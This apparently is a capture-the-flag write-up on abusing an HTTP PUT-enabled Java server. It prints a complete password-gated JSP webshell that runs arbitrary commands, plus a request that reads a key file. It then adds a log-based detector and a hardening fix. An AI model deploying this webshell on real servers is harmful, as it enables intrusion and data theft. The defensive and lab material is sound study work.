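Open the challenge URL, intercept the request with Burp Suite, then right-click it and send it to Repeater.
Use the OPTIONS method to see which HTTP methods the server supports.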

Construct the payload to achieve arbitrary command execution:

The code is as follows:
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!
// Runs the given command and returns its standard output as a string.
public static String excuteCmd(String c) {
    StringBuilder line = new StringBuilder();
    try {
        Process pro = Runtime.getRuntime().exec(c);
        BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
        String temp = null;
        while ((temp = buf.readLine()) != null) {
            line.append(temp + "\\n");
        }
        buf.close();
    } catch (Exception e) {
        line.append(e.getMessage());
    }
    return line.toString();
}
%>
<%
// Only runs when pwd matches and cmd is not empty; otherwise prints ":-)".
if ("023".equals(request.getParameter("pwd")) && !"".equals(request.getParameter("cmd"))) {
    out.println("" + excuteCmd(request.getParameter("cmd")) + "");
} else {
    out.println(":-)");
}
%>
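Click the Go button to create the one-line webshell file. Once it has been created, request the file to execute arbitrary commands:
http://<IP address>/1.jsp?cmd=cat /key.txt&pwd=023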
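The sequence above (OPTIONS probe, a script file written to the web root, then requests carrying a cmd parameter) leaves a recognisable trail in the access log. The detector below is an added example, not part of the original write-up. It assumes combined-format log lines and that the file is written with PUT, which the page does not name; the function name and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined-log style (not taken from the page).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:10:00:01 +0000] "OPTIONS / HTTP/1.1" 200 0
203.0.113.5 - - [10/Oct/2023:10:00:09 +0000] "PUT /1.jsp HTTP/1.1" 201 0
203.0.113.5 - - [10/Oct/2023:10:00:15 +0000] "GET /1.jsp?cmd=cat%20/key.txt&pwd=023 HTTP/1.1" 200 41
198.51.100.7 - - [10/Oct/2023:10:01:00 +0000] "GET /index.jsp?page=2 HTTP/1.1" 200 512
198.51.100.7 - - [10/Oct/2023:10:01:05 +0000] "PUT /upload/report.txt HTTP/1.1" 201 0
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
SCRIPT_EXT = (".jsp", ".jspx")   # server-side script extensions to watch
CMD_PARAMS = {"cmd"}             # parameter name used by the shell on this page


def find_webshell_activity(log_text):
    """Return findings as (kind, client, path, correlated) tuples."""
    probed = set()     # clients that sent an OPTIONS probe
    written = set()    # script paths created through PUT
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        url = urlsplit(target)
        is_script = url.path.lower().endswith(SCRIPT_EXT)
        succeeded = status.startswith("2")
        if method == "OPTIONS":
            probed.add(client)
        elif method == "PUT" and is_script and succeeded:
            # A script written over HTTP; correlated if the client probed first.
            written.add(url.path)
            findings.append(("script_written", client, url.path, client in probed))
        elif method in ("GET", "POST") and is_script and succeeded:
            # A command-style parameter sent to a script; correlated if the
            # script itself was created through PUT earlier in the log.
            if CMD_PARAMS & set(parse_qs(url.query)):
                findings.append(("command_parameter", client, url.path,
                                 url.path in written))
    return findings


if __name__ == "__main__":
    for finding in find_webshell_activity(SAMPLE_LOG):
        print(finding)
```

A successful PUT of a .jsp file is worth an alert on its own; on a server that does not need HTTP uploads, the fix is to keep the servlet container's default servlet read-only and reject PUT and DELETE.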
